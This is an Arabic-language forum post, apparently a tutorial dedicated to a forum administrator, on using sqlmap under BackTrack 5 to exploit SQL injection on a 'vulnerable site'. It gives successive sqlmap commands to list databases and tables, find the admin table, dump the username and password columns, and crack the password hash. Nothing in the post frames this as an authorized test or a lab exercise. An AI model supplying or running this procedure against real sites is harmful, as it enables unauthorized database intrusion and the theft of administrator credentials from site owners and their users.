بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
::===================::
اليوم أقدم لكم موضوع حصري حصري لأبعد الحدود وانا نزلته بمناسبة
::===================::
سبب طرح الموضوع
أعلان حبيبنا وأستاذنا ( Back Track ) عن دوري حقن sql وعز الله اني احترت في وصف هالأداري الرائع وفي نفس الوقت عشان المشتركين في الدورة يستفيدون
ايضا لأن ( Back Track ) صديقنا اسمه نفس أسم نظام باك تراك
يعني أهداء خاص له وللجميع
::===================::
طبعا الموضوع باين من عنوانه هو أحتراف أستغلال ثغرات SQL عبر نظام backtrack 5
::===================::
نبدء على بركة الله
أولا نشغل الباك تراك
ونختار من القائمة كما هي موضحه بالصورة
الأن بتظهر لك هذي الواجهه الرسومية
الأن كذا تمام هذه الأداه تغنيك عن اي برنامج او اي برمجة وهي فيها كل الأدوات الي تحتاجها
تقدر تكتب help ثم انتر عشان يعطيك جميع الأوامر لهذي الأداه الجبارة
الأن تكتب
python sqlmap.py -u xxx --dbs
xxx = الموقع المصاب بـ sql
الأن إظغط انتر وانتظر ثواني وبتظهر لك النتيجة مثل كذا
مثل ما شفت تلقائيا عرف اصدار القاعده وأظهر لنا القواعد تبع الموقع
الأن أكيد انت من النظرة الأولى بتعرف القاعده المطلوبة من أسمها
الأن بنعطيه أمر أظهار الجداول في القاعده الي بنختارها
python sqlmap.py -u xxx -D ddd --tables
xxx = الموقع المصاب
ddd = اسم القاعده الي بنطلع جداولها
الأن أظغط انتر وشوف النتيجة في الصورة الي تحت
مثل ما شفت طلع لنا الجداول الي داخل القاعده ومن ظمن الجداول جدول الـ الأدمن
الأن هدفنا عرض الأعمدة الي داخل الجدول عن طريق الأمر
python sqlmap.py -u xxx -D ddd -T ttt --columns
xxx = الموقع المصاب
ddd = اسم القاعده الي بنطلع جداولها
ttt = الجدول الي بنعرض الأعمده الي داخله مثل ( admin )
مثل الصورة الي تحت
الأن اظغط انت وشوف النتيجه
حلو ظهر لنا عمود اليوزر + عمود الباسورد
الأن يا طويل العمر نبغى نعرف الجدول الي داخل
انا ظهر لي عمود اسمه username شوف الأمر حتى نعرض محتواه
python sqlmap.py -u xxx -D ddd -T ttt -C ccc --dump
xxx = الموقع المصاب
ddd = اسم القاعده الي بنطلع جداولها
ttt = الجدول الي بنعرض الأعمده الي داخله
ccc = العمود الي بنظهر محتواه
مثل ما هو موضح بالصورة الي تحت
الأن أظغط انتر وشوف النتيجه اكيد بتعجبك
الأن أنا طلعت محتوى العمود username بنفس الأمر نطلع الباس
فقط نستبدل username بـ password
python sqlmap.py -u xxx -D ddd -T ttt -C ccc --dump
xxx = الموقع المصاب
ddd = اسم القاعده الي بنطلع جداولها
ttt = الجدول الي بنعرض الأعمده الي داخله
ccc = العمود الي بنظهر محتواه
مثل مافي الصورة
أظغط أنتر وشوف النتيجه
ا
اذا طلعت لك كما في الصورة فهذا طبيعي لان الباسورد مشفر
وهنا يقولك هل تريد ان تجرب فك الهاش
اذا كنت تريد فك الهاش اكتب Y
اذا ما تبي تفك الهاش اكتب N
واظغط انتر
الحمد لله طلعنا الباس
وهذي هي فكرة استغلال ثغرات SQL عبر نظام BACKTACK 5 اتمنى انكم استفدتو منها
ولو اني مقصر في الشرح لاكن اعذروني من زمان ما سويت شرح
--============ أهداء الى ============--
ozil mohamed
والي نسيته يعذرنا تحياتي لكم